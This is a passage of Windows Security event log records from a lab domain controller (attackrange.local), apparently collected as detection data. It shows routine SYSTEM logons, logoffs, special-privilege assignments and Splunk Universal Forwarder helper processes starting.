Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59790
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:08:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263514
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7187B2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263527
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718C30
Logon Type: 3
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263526
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718D1E
Logon Type: 3
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263525
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718D66
Logon Type: 3
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263524
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x718E19
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59797
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263523
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718E19
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263522
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x718D66
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 59794
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263521
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718D66
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263520
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x718D1E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263519
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718D1E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263518
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x718C30
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59793
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263517
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718C30
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263528
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:09:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263530
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x680
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 02:09:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263529
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 02:09:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263531
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1258
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 02:09:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263532
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1754
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:09:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263534
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 02:09:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263533
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a58
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 02:09:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263535
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718E19
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:09:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263538
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x71C817
Logon Type: 3
04/19/2021 02:09:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263537
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x71C817
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59808
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:09:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263536
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x71C817
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:10:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263539
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 02:10:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263541
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xffc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 02:10:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263540
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 02:10:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263542
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263543
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263544
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1794
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263545
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf68
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263548
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7202DB
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:10:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263547
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7202DB
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59821
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:10:54 PM
LogName=Security
